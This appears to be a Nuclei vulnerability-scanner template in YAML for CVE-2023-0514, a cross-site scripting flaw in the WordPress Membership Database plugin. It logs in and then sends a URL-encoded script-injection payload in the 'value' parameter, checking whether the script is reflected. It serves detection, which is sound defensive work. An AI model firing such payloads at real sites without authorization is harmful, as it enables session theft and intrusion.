55 lines
2.4 KiB
YAML
55 lines
2.4 KiB
YAML
id: CVE-2023-0514
|
|
|
|
info:
|
|
name: Membership Database <= 1.0 - Cross-Site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
|
remediation: |
|
|
Upgrade to a patched version of the Membership Database software or apply the necessary security patches provided by the vendor.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/c6cc400a-9bfb-417d-9206-5582a49d0f05
|
|
- https://wordpress.org/plugins/member-database/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-0514
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-0514
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00071
|
|
epss-percentile: 0.29578
|
|
cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: membership_database_project
|
|
product: membership_database
|
|
framework: wordpress
|
|
tags: wpscan,cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
- |
|
|
POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
action=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc
|
|
|
|
cookie-reuse: true
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- 'contains(content_type_2, "text/html")'
|
|
- 'contains(body_2, "<script>alert(document.domain)</script>")'
|
|
- 'contains(body_2, "Member Database")'
|
|
condition: and
|
|
# digest: 4a0a0047304502200b26db79022066cd10306675218681f477f81316ee29d101cb671204d03b2316022100fe7c230656e24917d13230be161615b9a9eb5f535599846b58dc03d027642401:922c64590222798bb761d5b6d8e72950 |